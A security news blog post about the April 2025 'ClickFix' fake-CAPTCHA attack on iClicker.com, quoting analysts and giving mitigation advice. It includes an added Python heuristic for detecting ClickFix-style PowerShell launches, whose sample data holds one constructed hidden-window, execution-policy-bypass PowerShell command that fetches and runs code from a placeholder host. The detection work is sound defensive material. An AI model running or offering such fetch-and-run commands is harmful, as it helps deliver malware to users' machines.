Fake CAPTCHA Attack Compromises iClicker, Exposes Thousands of Students to Malware in Sophisticated Social Engineering Campaign
- Cyber Jack
- May 12
- 3 min read
In a striking example of how trust can be weaponized in the digital age, iClicker — a popular digital classroom platform used by over 7 million students and 5,000 instructors — was recently the target of a sophisticated "ClickFix" attack that weaponized a fake CAPTCHA to deliver malware.
Between April 12 and April 16, 2025, visitors to iClicker.com were shown what appeared to be a standard CAPTCHA verification prompt asking users to click “I’m not a robot.” But this wasn’t a legitimate bot check — it was a trap. When clicked, the site silently copied a PowerShell command to the user’s clipboard. The CAPTCHA then instructed users to paste and run this code via the Windows Run dialog — a social engineering sleight of hand that exploited behavioral trust in common system prompts.
“This type of attack highlights a training gap: copying commands from trusted sites into terminals is not typically addressed in standard awareness programs,” said Randolph Barr, CISO at Cequence. “This is especially concerning for students or individuals using personal devices, where organizations have limited control — reinforcing the need for targeted education.”
The attack is part of a growing wave of ClickFix campaigns — socially engineered exploits that blur the line between technical hacking and user manipulation. Rather than relying on software vulnerabilities, these attacks rely on human error, specifically targeting how people respond to familiar interfaces.
A Campus-Wide Threat Vector
The University of Michigan was among the first to publicly report the incident through its Safe Computing team, warning that the PowerShell payload allowed attackers full access to infected machines. While the exact malware delivered remains unknown, analysts suspect it was an infostealer — capable of harvesting credentials, browser cookies, crypto wallets, and sensitive documents from browsers and local directories.
Aditya Sood, VP of Security Engineering and AI Strategy at Aryaka, said the attack was far from amateur.
“The attack on iClicker was not just a simple breach, but a sophisticated operation,” he explained. “It involved injecting a counterfeit CAPTCHA prompt that mimicked legitimate verification processes. This could be delivered via UI redressing or embedded malicious advertisements triggering a waterhole attack.”
The retrieved PowerShell commands were obfuscated and dynamic — designed to deliver different payloads based on the environment. If a user was deemed a real target, the malware was deployed. If the visitor was an automated analysis sandbox, the script downloaded a harmless Microsoft Visual C++ Redistributable to avoid detection.
A Security Response Mired in Obscurity
Although iClicker is a subsidiary of publishing giant Macmillan, the company remained silent following multiple media inquiries. A security bulletin quietly posted to the iClicker website on May 6 did acknowledge the breach — but the page carried a <meta name='robots' content='noindex, nofollow' /> tag, which tells search engines not to index or follow it, effectively keeping the announcement out of search results.
“We recently resolved an incident affecting the iClicker landing page… no iClicker data, apps, or operations were impacted,” read the statement. “An unrelated third party placed a false Captcha on our landing page before users logged in… Out of an abundance of caution, we recommend that any faculty or student who clicked on the false Captcha… run security software to ensure their devices remain protected.”
Security experts were quick to point out the challenges of defending against such attacks, especially in bring-your-own-device (BYOD) academic environments.
“This incident underscores the blurring line between technical exploits and behavioral manipulation,” Barr added. “Attackers are adapting to target the user’s trust and actions directly — an area where traditional endpoint protections are weaker.”
He also emphasized that CAPTCHA, a decades-old tool, is rapidly becoming obsolete. “There are commercial services and AI tools that can bypass common CAPTCHAs, and they can’t protect APIs or AI agents, which are quickly becoming top targets.”
What Comes Next?
Students and instructors who visited iClicker.com during the attack window and followed the CAPTCHA’s instructions are urged to change their passwords — not just on iClicker, but across all services — and run comprehensive malware scans. The use of a password manager is strongly advised to help isolate and secure account credentials.
For organizations and schools, experts recommend implementing group policy restrictions to disable PowerShell for non-admins, monitoring clipboard activity for suspicious behavior, and blocking access to known malicious IPs and domains.
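As an added illustration of the monitoring recommendation above (this is not code from the article or from any vendor quoted in it), the following heuristic flags the process shape a ClickFix paste produces on an endpoint: explorer.exe (the Run dialog's parent) starting PowerShell with a hidden window, a relaxed execution policy, or fetch-and-run content. The field names mimic Sysmon Event ID 1 records; the indicator patterns and all sample events are constructed for the example.

```python
"""Heuristic detection of ClickFix-style PowerShell launches (added example)."""
import re
from typing import Iterable, Optional

# PowerShell hosts a Run-dialog paste would start.
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
# explorer.exe is the parent of anything typed into Win+R; constructed assumption for the example.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits commonly paired in ClickFix lures (assumed indicator set, not an exhaustive rule).
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded_cmd": re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # Both an expression-evaluator and a remote-fetch cmdlet in one command line, in either order.
    "download_exec": re.compile(
        r"(?=.*\b(iex|invoke-expression)\b)(?=.*\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b)", re.I),
}

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> Optional[dict]:
    """Return a finding for one process-creation record, or None if it looks benign."""
    if _basename(event.get("Image", "")) not in POWERSHELL_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    from_run_dialog = _basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS
    # Interactive PowerShell with no indicators is ordinary admin work; with indicators it matches
    # the ClickFix chain (explorer.exe -> powershell.exe -> fetch and run). Elsewhere, two or more
    # indicators are still worth a look.
    if from_run_dialog and hits:
        severity = "high" if len(hits) >= 2 else "medium"
    elif len(hits) >= 2:
        severity = "medium"
    else:
        return None
    return {"severity": severity, "indicators": hits, "command": cmd}

def scan(events: Iterable[dict]) -> list:
    return [f for f in (score_event(e) for e in events) if f]

# Constructed sample records, not telemetry from the iClicker incident.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'https://placeholder.invalid/p')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",          # admin running a local script: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\cleanup.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",  # scheduled task, no indicators: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["indicators"])
```

On a real fleet this belongs in the SIEM rule language rather than a script, and the parent-process check will miss pastes into an already-open console, so treat it as one signal alongside the group-policy restriction the paragraph recommends.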
“A unified SASE platform providing integrated network and security can effectively defend against ClickFix-style attacks,” said Aryaka’s Sood. “By integrating DNS filtering, SWGs, and threat prevention into a single architecture, we can inspect all user traffic, regardless of location, and block malicious overlays and file downloads in real-time.”
As social engineering becomes more personalized and technically deceptive, the iClicker breach serves as a stark warning: cybersecurity can’t rely solely on code-based defense. In an age of digital trust, human behavior is the new attack surface.